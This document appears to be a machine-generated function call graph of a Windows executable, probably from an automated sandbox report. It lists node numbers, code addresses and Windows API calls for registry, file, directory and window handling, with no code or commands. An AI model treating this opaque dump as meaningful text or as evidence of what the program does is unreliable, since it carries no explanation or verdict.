49188f 50176->50179 50177 49182a 50180 49182e 50177->50180 50181 491863 50177->50181 50315 4528f4 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 50179->50315 50183 447008 18 API calls 50180->50183 50314 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50181->50314 50188 49183d 50183->50188 50193 491930 50184->50193 50194 491900 50184->50194 50189 447008 18 API calls 50185->50189 50187 49189c 50316 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50187->50316 50240 452c6c 50188->50240 50192 4918ce 50189->50192 50317 45275c 50192->50317 50203 491978 50193->50203 50204 49193f 50193->50204 50199 447008 18 API calls 50194->50199 50195 4918ad 50195->50099 50196 49184d 50313 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50196->50313 50198 4918db 50324 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50198->50324 50202 49190d 50199->50202 50325 452dfc Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 50202->50325 50211 4919c0 50203->50211 50212 491987 50203->50212 50206 447008 18 API calls 50204->50206 50208 49194e 50206->50208 50207 49191a 50326 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50207->50326 50210 447008 18 API calls 50208->50210 50213 49195f 50210->50213 50216 4919d3 50211->50216 50223 491a89 50211->50223 50214 447008 18 API calls 50212->50214 50219 447288 5 API calls 50213->50219 50215 491996 50214->50215 50217 447008 18 API calls 50215->50217 50220 447008 18 API calls 50216->50220 50218 4919a7 50217->50218 50224 447288 5 API calls 50218->50224 50219->50099 50221 491a00 50220->50221 50222 447008 18 API calls 50221->50222 50225 491a17 50222->50225 50223->50099 50330 446fac 18 API calls 50223->50330 50224->50099 50327 407de4 7 API calls 50225->50327 50227 491aa2 50331 42e8d8 FormatMessageA 50227->50331 50232 491a39 50233 447008 18 API calls 50232->50233 50234 491a4d 50233->50234 50328 408510 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50234->50328 50236 491a58 50329 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50236->50329 50238 491a64 50239->50177 50336 452710 50240->50336 50242 452c89 50242->50196 50243 452c85 50243->50242 50244 452cad MoveFileA GetLastError 50243->50244 50342 45274c 50244->50342 50247->50099 50249 406bc7 50248->50249 50250 406be0 50249->50250 50251 406be9 50249->50251 50252 403400 4 API calls 50250->50252 50345 403778 50251->50345 50253 406be7 50252->50253 50255 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50253->50255 50255->50099 50256->50074 50257->50099 50258->50082 50259->50099 50260->50083 50261->50099 50263 403738 50262->50263 50264 4072ba SetCurrentDirectoryA 50263->50264 50264->50092 50265->50099 50267 403738 50266->50267 50268 42c837 GetFullPathNameA 50267->50268 50269 42c843 50268->50269 50270 42c85a 50268->50270 50269->50270 50271 42c84b 50269->50271 50272 403494 4 API calls 50270->50272 50274 4034e0 4 API calls 50271->50274 50273 42c858 50272->50273 50275 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50273->50275 50274->50273 50275->50099 50276->50108 50277->50099 50278->50121 50279->50099 50352 42c7ac 50280->50352 50283 403778 4 API calls 50284 42c8d5 50283->50284 50285 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50284->50285 50285->50099 50367 42c684 50286->50367 50289 42c8f0 50291 403400 4 API calls 50289->50291 50290 42c8f9 50292 403778 4 API calls 50290->50292 50293 42c8f7 50291->50293 50292->50293 50294 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50293->50294 50294->50099 50295->50139 50296->50099 50298 42c7ac IsDBCSLeadByte 50297->50298 50299 42c94c 50298->50299 50300 403778 4 API calls 50299->50300 50301 42c95e 50300->50301 50302 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50301->50302 50302->50099 50304 42c7ac IsDBCSLeadByte 50303->50304 50305 42c974 50304->50305 50306 403778 4 API calls 50305->50306 50307 42c985 50306->50307 50308 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50307->50308 50308->50099 50309->50166 50310->50099 50311->50175 50312->50099 50313->50099 50314->50099 50315->50187 50316->50195 50318 452710 2 API calls 50317->50318 50319 452772 50318->50319 50320 452776 50319->50320 50321 452794 CreateDirectoryA GetLastError 50319->50321 50320->50198 50322 45274c Wow64RevertWow64FsRedirection 50321->50322 50323 4527ba 50322->50323 50323->50198 50324->50099 50325->50207 50326->50099 50327->50232 50328->50236 50329->50238 50330->50227 50332 42e8fe 50331->50332 50333 4034e0 4 API calls 50332->50333 50334 42e91b 50333->50334 50335 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50334->50335 50335->50099 50337 45271e 50336->50337 50338 45271a 50336->50338 50339 452727 Wow64DisableWow64FsRedirection 50337->50339 50340 452740 SetLastError 50337->50340 50338->50243 50341 45273b 50339->50341 50340->50341 50341->50243 50343 452751 Wow64RevertWow64FsRedirection 50342->50343 50344 45275b 50342->50344 50343->50344 50344->50196 50346 4037aa 50345->50346 50347 40377d 50345->50347 50348 403400 4 API calls 50346->50348 50347->50346 50349 403791 50347->50349 50351 4037a0 50348->50351 50350 4034e0 4 API calls 50349->50350 50350->50351 50351->50253 50357 42c68c 50352->50357 50354 42c80b 50354->50283 50355 42c7c1 50355->50354 50364 42c454 IsDBCSLeadByte 50355->50364 50358 42c69d 50357->50358 50359 42c701 50358->50359 50363 42c6bb 50358->50363 50361 42c6fc 50359->50361 50366 42c454 IsDBCSLeadByte 50359->50366 50361->50355 50363->50361 50365 42c454 IsDBCSLeadByte 50363->50365 50364->50355 50365->50363 50366->50361 50368 42c68c IsDBCSLeadByte 50367->50368 50369 42c68b 50368->50369 50369->50289 50369->50290 50370 41364c SetWindowLongA GetWindowLongA 50371 4136a9 SetPropA SetPropA 50370->50371 50372 41368b GetWindowLongA 50370->50372 50376 41f3ac 50371->50376 50372->50371 50373 41369a SetWindowLongA 50372->50373 50373->50371 50381 415280 50376->50381 50388 423c1c 50376->50388 50482 423a94 50376->50482 50377 4136f9 50382 41528d 50381->50382 50383 4152f3 50382->50383 50384 4152e8 50382->50384 50387 4152f1 50382->50387 50489 424b9c 13 API calls 50383->50489 50384->50387 50490 41506c 46 API calls 50384->50490 50387->50377 50404 423c52 50388->50404 50391 423cfc 50393 423d03 50391->50393 50394 423d37 50391->50394 50392 423c9d 50395 423ca3 50392->50395 50396 423d60 50392->50396 50397 423d09 50393->50397 50440 423fc1 50393->50440 50399 423d42 50394->50399 50400 4240aa IsIconic 50394->50400 50398 423ca8 50395->50398 50414 423cd5 50395->50414 50401 423d72 50396->50401 50402 423d7b 50396->50402 50406 423f23 SendMessageA 50397->50406 50407 423d17 50397->50407 50410 423e06 50398->50410 50411 423cae 50398->50411 50412 4240e6 50399->50412 50413 423d4b 50399->50413 50408 423c73 50400->50408 50409 4240be GetFocus 50400->50409 50403 423d88 50401->50403 50415 423d79 50401->50415 50500 4241a4 11 API calls 50402->50500 50501 4241ec IsIconic 50403->50501 50404->50408 50491 423b78 50404->50491 50406->50408 50407->50408 50441 423cd0 50407->50441 50461 423f66 50407->50461 50408->50377 50409->50408 50417 4240cf 50409->50417 50513 423b94 NtdllDefWindowProc_A 50410->50513 50418 423cb7 50411->50418 50419 423e2e PostMessageA 50411->50419 50535 424860 WinHelpA PostMessageA 50412->50535 50422 4240fd 50413->50422 50413->50441 50414->50408 50431 423cee 50414->50431 50432 423e4f 50414->50432 50509 423b94 NtdllDefWindowProc_A 50415->50509 50534 41f004 GetCurrentThreadId 74285940 50417->50534 50426 423cc0 50418->50426 50427 423eb5 50418->50427 50519 423b94 NtdllDefWindowProc_A 50419->50519 50429 424106 50422->50429 50430 42411b 50422->50430 50435 423cc9 50426->50435 50436 423dde IsIconic 50426->50436 50437 423ebe 50427->50437 50438 423eef 50427->50438 50428 423e49 50428->50408 50536 4244e4 50429->50536 50542 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 50430->50542 50431->50441 50442 423e1b 50431->50442 50495 423b94 NtdllDefWindowProc_A 50432->50495 50434 4240d6 50434->50408 50445 4240de SetFocus 50434->50445 50435->50441 50446 423da1 50435->50446 50448 423dfa 50436->50448 50449 423dee 50436->50449 50521 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50437->50521 50496 423b94 NtdllDefWindowProc_A 50438->50496 50440->50408 50456 423fe7 IsWindowEnabled 50440->50456 50441->50408 50499 423b94 NtdllDefWindowProc_A 50441->50499 50514 424188 50442->50514 50444 423e55 50453 423e93 50444->50453 50454 423e71 50444->50454 50445->50408 50446->50408 50510 422c5c ShowWindow PostMessageA PostQuitMessage 50446->50510 50512 423b94 NtdllDefWindowProc_A 50448->50512 50511 423bd0 15 API calls 50449->50511 50462 423a94 6 API calls 50453->50462 50520 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50454->50520 50455 423ec6 50464 423ed8 50455->50464 50522 41ef68 50455->50522 50456->50408 50465 423ff5 50456->50465 50459 423ef5 50466 423f0d 50459->50466 50497 41eeb4 GetCurrentThreadId 74285940 50459->50497 50461->50408 50468 423f88 IsWindowEnabled 50461->50468 50469 423e9b PostMessageA 50462->50469 50528 423b94 NtdllDefWindowProc_A 50464->50528 50475 423ffc IsWindowVisible 50465->50475 50473 423a94 6 API calls 50466->50473 50467 423e79 PostMessageA 50467->50408 50468->50408 50474 423f96 50468->50474 50469->50408 50473->50408 50529 412320 7 API calls 50474->50529 50475->50408 50477 42400a GetFocus 50475->50477 50530 4181f0 50477->50530 50479 42401f SetFocus 50532 415250 50479->50532 50483 423b1d 50482->50483 50484 423aa4 50482->50484 50483->50377 50484->50483 50485 423aaa EnumWindows 50484->50485 50485->50483 50486 423ac6 GetWindow GetWindowLongA 50485->50486 50646 423a2c GetWindow 50485->50646 50487 423ae5 50486->50487 50487->50483 50488 423b11 SetWindowPos 50487->50488 50488->50483 50488->50487 50489->50387 50490->50387 50492 423b82 50491->50492 50493 423b8d 50491->50493 50492->50493 50543 408728 GetSystemDefaultLCID 50492->50543 50493->50391 50493->50392 50495->50444 50496->50459 50498 41ef39 50497->50498 50498->50466 50499->50408 50500->50408 50502 424233 50501->50502 50503 4241fd SetActiveWindow 50501->50503 50502->50408 50618 42365c 50503->50618 50507 42421a 50507->50502 50508 42422d SetFocus 50507->50508 50508->50502 50509->50408 50510->50408 50511->50408 50512->50408 50513->50408 50631 41db40 50514->50631 50517 4241a0 50517->50408 50518 424194 LoadIconA 50518->50517 50519->50428 50520->50467 50521->50455 50523 41ef70 IsWindow 50522->50523 50524 41ef9c 50522->50524 50525 41ef7f EnableWindow 50523->50525 50527 41ef8a 50523->50527 50524->50464 50525->50527 50526 402660 4 API calls 50526->50527 50527->50523 50527->50524 50527->50526 50528->50408 50529->50408 50531 4181fa 50530->50531 50531->50479 50533 41526b SetFocus 50532->50533 50533->50408 50534->50434 50535->50428 50537 4244f0 50536->50537 50538 42450a 50536->50538 50539 42451f 50537->50539 50540 4244f7 SendMessageA 50537->50540 50541 402648 4 API calls 50538->50541 50539->50408 50540->50539 50541->50539 50542->50428 50598 408570 GetLocaleInfoA 50543->50598 50548 408570 5 API calls 50549 40877d 50548->50549 50550 408570 5 API calls 50549->50550 50551 4087a1 50550->50551 50610 4085bc GetLocaleInfoA 50551->50610 50554 4085bc GetLocaleInfoA 50555 4087d1 50554->50555 50556 408570 5 API calls 50555->50556 50557 4087eb 50556->50557 50558 4085bc GetLocaleInfoA 50557->50558 50559 408808 50558->50559 50560 408570 5 API calls 50559->50560 50561 408822 50560->50561 50562 403450 4 API calls 50561->50562 50563 40882f 50562->50563 50564 408570 5 API calls 50563->50564 50565 408844 50564->50565 50566 403450 4 API calls 50565->50566 50567 408851 50566->50567 50568 4085bc GetLocaleInfoA 50567->50568 50569 40885f 50568->50569 50570 408570 5 API calls 50569->50570 50571 408879 50570->50571 50572 403450 4 API calls 50571->50572 50573 408886 50572->50573 50574 408570 5 API calls 50573->50574 50575 40889b 50574->50575 50576 403450 4 API calls 50575->50576 50577 4088a8 50576->50577 50578 408570 5 API calls 50577->50578 50579 4088bd 50578->50579 50580 4088da 50579->50580 50581 4088cb 50579->50581 50583 403494 4 API calls 50580->50583 50582 403494 4 API calls 50581->50582 50584 4088d8 50582->50584 50583->50584 50599 408597 50598->50599 50600 4085a9 50598->50600 50601 4034e0 4 API calls 50599->50601 50602 403494 4 API calls 50600->50602 50603 4085a7 50601->50603 50602->50603 50604 403450 50603->50604 50605 403454 50604->50605 50608 403464 50604->50608 50607 4034bc 4 API calls 50605->50607 50605->50608 50606 403490 50606->50548 50607->50608 50608->50606 50609 402660 4 API calls 50608->50609 50609->50606 50611 4085d8 50610->50611 50611->50554 50627 423608 SystemParametersInfoA 50618->50627 50621 423675 ShowWindow 50623 423680 50621->50623 50624 423687 50621->50624 50630 423638 SystemParametersInfoA 50623->50630 50626 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50624->50626 50626->50507 50628 423626 50627->50628 50628->50621 50629 423638 SystemParametersInfoA 50628->50629 50629->50621 50630->50624 50634 41db64 50631->50634 50635 41db4a 50634->50635 50636 41db71 50634->50636 50635->50517 50635->50518 50636->50635 50643 40cc80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50636->50643 50638 41db8e 50638->50635 50639 41dba8 50638->50639 50640 41db9b 50638->50640 50644 41bd9c 11 API calls 50639->50644 50645 41b398 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50640->50645 50643->50638 50644->50635 50645->50635 50647 423a4d GetWindowLongA 50646->50647 50648 423a59 50646->50648 50647->50648 50649 4804c6 50650 4804cf 50649->50650 50651 4804fa 50649->50651 50650->50651 50652 4804ec 50650->50652 50654 480539 50651->50654 51063 47efb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50651->51063 51061 476b6c 188 API calls 50652->51061 50655 48055d 50654->50655 50659 480550 50654->50659 50660 480552 50654->50660 50662 480599 50655->50662 50663 48057b 50655->50663 50657 4804f1 50657->50651 51062 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50657->51062 50658 48052c 51064 47f018 42 API calls 50658->51064 50666 47eff4 42 API calls 50659->50666 51065 47f088 42 API calls 50660->51065 51068 47ee48 24 API calls 50662->51068 50667 480590 50663->50667 51066 47f018 42 API calls 50663->51066 50666->50655 51067 47ee48 24 API calls 50667->51067 50669 480597 50672 4805a9 50669->50672 50673 4805af 50669->50673 50674 4805ad 50672->50674 50775 47eff4 50672->50775 50673->50674 50675 47eff4 42 API calls 50673->50675 50780 47c3a4 50674->50780 50675->50674 51137 47eadc 42 API calls 50775->51137 50777 47f00f 51138 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50777->51138 51139 42d8a8 GetWindowsDirectoryA 50780->51139 50782 47c3c2 50783 403450 4 API calls 50782->50783 50784 47c3cf 50783->50784 51141 42d8d4 GetSystemDirectoryA 50784->51141 50786 47c3d7 50787 403450 4 API calls 50786->50787 50788 47c3e4 50787->50788 51143 42d900 50788->51143 50790 47c3ec 50791 403450 4 API calls 50790->50791 50792 47c3f9 50791->50792 50793 47c402 50792->50793 50794 47c41e 50792->50794 51199 42d218 50793->51199 50795 403400 4 API calls 50794->50795 50797 47c41c 50795->50797 50799 47c463 50797->50799 50801 42c8dc 5 API calls 50797->50801 51147 47c22c 50799->51147 50800 403450 4 API calls 50800->50797 50803 47c43e 50801->50803 50805 403450 4 API calls 50803->50805 50807 47c44b 50805->50807 50806 403450 4 API calls 50808 47c47f 50806->50808 50807->50799 50812 403450 4 API calls 50807->50812 50809 47c49d 50808->50809 50810 4035c0 4 API calls 50808->50810 50811 47c22c 8 API calls 50809->50811 50810->50809 50813 47c4ac 50811->50813 50812->50799 50814 403450 4 API calls 50813->50814 50815 47c4b9 50814->50815 50816 47c4e1 50815->50816 50817 42c40c 5 API calls 50815->50817 50818 47c548 50816->50818 50822 47c22c 8 API calls 50816->50822 50819 47c4cf 50817->50819 50820 47c572 50818->50820 50821 47c551 50818->50821 50824 4035c0 4 API calls 50819->50824 51158 42c40c 50820->51158 50825 42c40c 5 API calls 50821->50825 50826 47c4f9 50822->50826 50824->50816 50828 47c55e 50825->50828 50829 403450 4 API calls 50826->50829 51061->50657 51063->50658 51064->50654 51065->50655 51066->50667 51067->50669 51068->50669 51137->50777 51140 42d8c9 51139->51140 51140->50782 51142 42d8f5 51141->51142 51142->50786 51144 403400 4 API calls 51143->51144 51145 42d910 GetModuleHandleA GetProcAddress 51144->51145 51146 42d929 51145->51146 51146->50790 51209 42de2c 51147->51209 51149 47c252 51150 47c256 51149->51150 51151 47c278 51149->51151 51212 42dd5c 51150->51212 51152 403400 4 API calls 51151->51152 51154 47c27f 51152->51154 51154->50806 51156 47c26d RegCloseKey 51156->51154 51157 403400 4 API calls 51157->51156 51159 42c416 51158->51159 51160 42c439 51158->51160 51200 4038a4 4 API calls 51199->51200 51202 42d22b 51200->51202 51201 42d242 GetEnvironmentVariableA 51201->51202 51203 42d24e 51201->51203 51202->51201 51206 42d255 51202->51206 51247 42dbe0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51202->51247 51204 403400 4 API calls 51203->51204 51204->51206 51206->50800 51210 42de37 51209->51210 51211 42de3d RegOpenKeyExA 51209->51211 51210->51211 51211->51149 51215 42dc10 51212->51215 51216 42dc36 RegQueryValueExA 51215->51216 51221 42dc59 51216->51221 51229 42dc7b 51216->51229 51217 403400 4 API calls 51219 42dd47 51217->51219 51218 42dc73 51220 403400 4 API calls 51218->51220 51219->51156 51219->51157 51220->51229 51221->51218 51222 4034e0 4 API calls 51221->51222 51221->51229 51232 403744 51221->51232 51222->51221 51224 42dcb0 RegQueryValueExA 51224->51216 51225 42dccc 51224->51225 51225->51229 51236 4038a4 51225->51236 51229->51217 51230 403744 4 API calls 51231 42dd20 51230->51231 51233 40374a 51232->51233 51235 40375b 51232->51235 51234 4034bc 4 API calls 51233->51234 51233->51235 51234->51235 51235->51224 51237 4038b1 51236->51237 51243 4038e1 51236->51243 51239 4038da 51237->51239 51241 4038bd 51237->51241 51238 403400 4 API calls 51244 4038cb 51238->51244 51240 4034bc 4 API calls 51239->51240 51240->51243 51245 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51241->51245 51243->51238 51244->51230 51244->51231 51245->51244 51247->51202 53303 46be48 53304 46c254 53303->53304 53305 46be7c 53303->53305 53306 403400 4 API calls 53304->53306 53307 46beb8 53305->53307 53310 46bf14 53305->53310 53311 46bef2 53305->53311 53312 46bf03 53305->53312 53313 46bed0 53305->53313 53314 46bee1 53305->53314 53308 46c293 53306->53308 53307->53304 53389 468fe0 53307->53389 53316 403400 4 API calls 53308->53316 53621 46bdd8 45 API calls 53310->53621 53354 46ba08 53311->53354 53620 46bbc8 67 API calls 53312->53620 53618 46b758 47 API calls 53313->53618 53619 46b8c0 42 API calls 53314->53619 53321 46c29b 53316->53321 53322 46bed6 53322->53304 53322->53307 53323 46bf50 53323->53304 53324 494770 18 API calls 53323->53324 53340 46bf93 53323->53340 53324->53340 53326 414af8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53326->53340 53327 46c0b6 53622 48300c 123 API calls 53327->53622 53330 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53330->53340 53331 42cbd0 6 API calls 53331->53340 53332 46c0d1 53332->53304 53334 46b2a0 23 API calls 53334->53340 53337 46c136 53341 457d58 24 API calls 53337->53341 53338 46c17c 53342 46b2a0 23 API calls 53338->53342 53339 46c18e 53468 46b2a0 53339->53468 53340->53304 53340->53326 53340->53327 53340->53330 53340->53331 53340->53334 53340->53337 53340->53338 53340->53339 53392 468f1c 53340->53392 53400 46b00c 53340->53400 53407 46a26c 53340->53407 53545 482b0c 53340->53545 53631 46b514 19 API calls 53340->53631 53344 46c155 53341->53344 53342->53304 53345 457d58 24 API calls 53344->53345 53345->53338 53346 46c19b 53347 46c1c4 SetActiveWindow 53346->53347 53348 46c1dc 53346->53348 53347->53348 53503 46a60c 53348->53503 53350 46c1ff 53350->53338 53351 46c21a 53350->53351 53623 46b11c 53351->53623 53632 46c6cc 53354->53632 53357 46bb8a 53358 403420 4 API calls 53357->53358 53360 46bba4 53358->53360 53362 403400 4 API calls 53360->53362 53361 46ba56 53363 46bb76 53361->53363 53639 455f70 13 API calls 53361->53639 53365 46bbac 53362->53365 53363->53357 53364 403450 4 API calls 53363->53364 53364->53357 53367 403400 4 API calls 53365->53367 53368 46bbb4 53367->53368 53368->53307 53369 42cd58 7 API calls 53373 46bb12 53369->53373 53370 46bb39 53370->53357 53370->53363 53375 42cd58 7 API calls 53370->53375 53371 46bad9 53371->53357 53371->53369 53371->53370 53372 46ba74 53372->53371 53640 46696c 53372->53640 53373->53370 53377 451444 4 API calls 53373->53377 53378 46bb4f 53375->53378 53380 46bb29 53377->53380 53378->53363 53383 451444 4 API calls 53378->53383 53379 46696c 19 API calls 53381 46bab4 53379->53381 53645 47eadc 42 API calls 53380->53645 53385 451414 4 API calls 53381->53385 53384 46bb66 53383->53384 53646 47eadc 42 API calls 53384->53646 53387 46bac9 53385->53387 53644 47eadc 42 API calls 53387->53644 53390 468f1c 19 API calls 53389->53390 53391 468fef 53390->53391 53391->53323 53393 468f4b 53392->53393 53394 4078fc 19 API calls 53393->53394 53397 468f8c 53393->53397 53395 468f84 53394->53395 53766 453330 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53395->53766 53398 403400 4 API calls 53397->53398 53399 468fa4 53398->53399 53399->53340 53401 46b01d 53400->53401 53402 46b018 53400->53402 53852 469dec 46 API calls 53401->53852 53403 46b01b 53402->53403 53767 46aa78 53402->53767 53403->53340 53405 46b025 53405->53340 53408 403400 4 API calls 53407->53408 53409 46a299 53408->53409 53875 47d9bc 53409->53875 53411 46a2f8 53412 46a315 53411->53412 53413 46a2fc 53411->53413 53414 46a306 53412->53414 53885 494660 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53412->53885 53882 466b6c 53413->53882 53418 46a434 53414->53418 53419 46a49f 53414->53419 53467 46a5a9 53414->53467 53417 46a331 53417->53414 53421 46a339 53417->53421 53422 403494 4 API calls 53418->53422 53423 403494 4 API calls 53419->53423 53420 403420 4 API calls 53424 46a5d3 53420->53424 53425 46b2a0 23 API calls 53421->53425 53426 46a441 53422->53426 53427 46a4ac 53423->53427 53424->53340 53435 46a346 53425->53435 53428 40357c 4 API calls 53426->53428 53429 40357c 4 API calls 53427->53429 53430 46a44e 53428->53430 53431 46a4b9 53429->53431 53432 40357c 4 API calls 53430->53432 53433 40357c 4 API calls 53431->53433 53436 46a45b 53432->53436 53434 46a4c6 53433->53434 53438 40357c 4 API calls 53434->53438 53441 46a387 53435->53441 53442 46a36f SetActiveWindow 53435->53442 53437 40357c 4 API calls 53436->53437 53439 46a468 53437->53439 53440 46a4d3 53438->53440 53443 466b6c 20 API calls 53439->53443 53444 40357c 4 API calls 53440->53444 53886 42f570 53441->53886 53442->53441 53445 46a476 53443->53445 53446 46a4e1 53444->53446 53447 40357c 4 API calls 53445->53447 53448 414b28 4 API calls 53446->53448 53451 46a47f 53447->53451 53458 46a49d 53448->53458 53453 40357c 4 API calls 53451->53453 53456 46a48c 53453->53456 53455 46a3d8 53459 46b11c 21 API calls 53455->53459 53457 414b28 4 API calls 53456->53457 53457->53458 53903 466ea4 53458->53903 53460 46a40a 53459->53460 53460->53340 53461 46a503 53462 414b28 4 API calls 53461->53462 53461->53467 53467->53420 53469 468fe0 19 API calls 53468->53469 53470 46b2b8 53469->53470 53471 46b2da 53470->53471 53472 465638 7 API calls 53470->53472 54022 465638 53471->54022 53472->53471 53476 46b2f2 53477 46b11c 21 API calls 53476->53477 53478 46b32a 53477->53478 53479 414b28 4 API calls 53478->53479 53480 46b33e 53479->53480 53481 46b374 53480->53481 53482 46b34a 53480->53482 53485 46b393 53481->53485 53486 46b3bd 53481->53486 53483 414b28 4 API calls 53482->53483 53484 46b35e 53483->53484 53488 414b28 4 API calls 53484->53488 53489 414b28 4 API calls 53485->53489 53487 414b28 4 API calls 53486->53487 53490 46b3d1 53487->53490 53491 46b372 53488->53491 53492 46b3a7 53489->53492 53493 414b28 4 API calls 53490->53493 54039 46b034 53491->54039 53494 414b28 4 API calls 53492->53494 53493->53491 53494->53491 53498 468fe0 19 API calls 53501 46b46f 53498->53501 53499 46b40f 53499->53498 53500 46b4d2 53500->53346 53501->53500 54044 4946bc 18 API calls 53501->54044 53505 46a637 53503->53505 53504 46a66e 53507 46a7e3 53504->53507 53520 46a682 53504->53520 53505->53504 54064 47dc30 53505->54064 53510 46a817 53507->53510 53516 46a801 53507->53516 53544 46a95a 53507->53544 53508 403400 4 API calls 53512 46a97f 53508->53512 53509 46a7c0 53513 46a7db 53509->53513 53518 402660 4 API calls 53509->53518 53511 414b28 4 API calls 53510->53511 53517 46a815 53511->53517 53512->53350 53513->53350 53514 402660 4 API calls 53514->53520 53515 402648 4 API calls 53515->53520 53521 414b28 4 API calls 53516->53521 54076 495520 MulDiv 53517->54076 53518->53513 53519 46a78c 53523 457d58 24 API calls 53519->53523 53520->53514 53520->53515 53529 46a6f5 53520->53529 53521->53517 53523->53509 53524 46a838 53527 466ea4 11 API calls 53524->53527 53526 457d58 24 API calls 53526->53529 53528 46a86c 53527->53528 53529->53509 53529->53519 53529->53526 53531 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53529->53531 54075 403ba4 7 API calls 53529->54075 53531->53529 53544->53508 53546 46c6cc 48 API calls 53545->53546 53547 482b4f 53546->53547 53548 482b58 53547->53548 54292 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53547->54292 53550 414af8 4 API calls 53548->53550 53551 482b68 53550->53551 53552 403450 4 API calls 53551->53552 53553 482b75 53552->53553 54102 46ca24 53553->54102 53556 482b85 53557 414af8 4 API calls 53556->53557 53559 482b95 53557->53559 53560 403450 4 API calls 53559->53560 53561 482ba2 53560->53561 53562 469bd4 SendMessageA 53561->53562 53563 482bbb 53562->53563 53564 482c0c 53563->53564 54294 479c64 23 API calls 53563->54294 53566 4241ec 11 API calls 53564->53566 53567 482c16 53566->53567 53568 482c3c 53567->53568 53569 482c27 SetActiveWindow 53567->53569 54131 481f3c 53568->54131 53569->53568 53618->53322 53619->53307 53620->53307 53621->53307 53622->53332 53624 468f1c 19 API calls 53623->53624 53631->53340 53647 46c764 53632->53647 53635 414af8 53636 414b06 53635->53636 53637 4034e0 4 API calls 53636->53637 53638 414b13 53637->53638 53638->53361 53639->53372 53642 466986 53640->53642 53641 4078fc 19 API calls 53643 4669c1 53641->53643 53642->53641 53643->53379 53644->53371 53645->53370 53646->53363 53648 414af8 4 API calls 53647->53648 53649 46c798 53648->53649 53708 466c04 53649->53708 53653 46c7aa 53654 46c7b9 53653->53654 53656 46c7d2 53653->53656 53742 47eadc 42 API calls 53654->53742 53659 46c819 53656->53659 53661 46c800 53656->53661 53657 403420 4 API calls 53658 46ba3a 53657->53658 53658->53357 53658->53635 53660 46c87e 53659->53660 53674 46c81d 53659->53674 53745 42cb5c CharNextA 53660->53745 53743 47eadc 42 API calls 53661->53743 53664 46c88d 53665 46c891 53664->53665 53668 46c8aa 53664->53668 53746 47eadc 42 API calls 53665->53746 53667 46c865 53744 47eadc 42 API calls 53667->53744 53669 46c8ce 53668->53669 53722 466d74 53668->53722 53747 47eadc 42 API calls 53669->53747 53674->53667 53674->53668 53677 46c8e7 53678 403778 4 API calls 53677->53678 53679 46c8fd 53678->53679 53730 42c9ac 53679->53730 53682 46c90e 53748 466e00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53682->53748 53683 46c93f 53684 42c8dc 5 API calls 53683->53684 53686 46c94a 53684->53686 53688 42c40c 5 API calls 53686->53688 53687 46c921 53689 451444 4 API calls 53687->53689 53690 46c955 53688->53690 53691 46c92e 53689->53691 53692 42cbd0 6 API calls 53690->53692 53749 47eadc 42 API calls 53691->53749 53694 46c960 53692->53694 53734 46c6f8 53694->53734 53696 46c968 53697 42cd58 7 API calls 53696->53697 53698 46c970 53697->53698 53699 46c974 53698->53699 53700 46c98a 53698->53700 53750 47eadc 42 API calls 53699->53750 53702 46c7cd 53700->53702 53703 46c994 53700->53703 53702->53657 53704 46c99c GetDriveTypeA 53703->53704 53704->53702 53713 466c1e 53708->53713 53710 42cbd0 6 API calls 53710->53713 53711 403450 4 API calls 53711->53713 53712 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53712->53713 53713->53710 53713->53711 53713->53712 53714 466c67 53713->53714 53752 42cabc 53713->53752 53715 403420 4 API calls 53714->53715 53716 466c81 53715->53716 53717 414b28 53716->53717 53718 414af8 4 API calls 53717->53718 53719 414b4c 53718->53719 53720 403400 4 API calls 53719->53720 53721 414b7d 53720->53721 53721->53653 53723 466d7e 53722->53723 53724 466d91 53723->53724 53763 42cb4c CharNextA 53723->53763 53724->53669 53726 466da4 53724->53726 53727 466dae 53726->53727 53728 466ddb 53727->53728 53764 42cb4c CharNextA 53727->53764 53728->53669 53728->53677 53731 42ca05 53730->53731 53732 42c9c2 53730->53732 53731->53682 53731->53683 53732->53731 53765 42cb4c CharNextA 53732->53765 53735 46c75d 53734->53735 53736 46c70b 53734->53736 53735->53696 53736->53735 53737 41eeb4 2 API calls 53736->53737 53738 46c71b 53737->53738 53739 46c735 SHPathPrepareForWriteA 53738->53739 53740 41ef68 6 API calls 53739->53740 53741 46c755 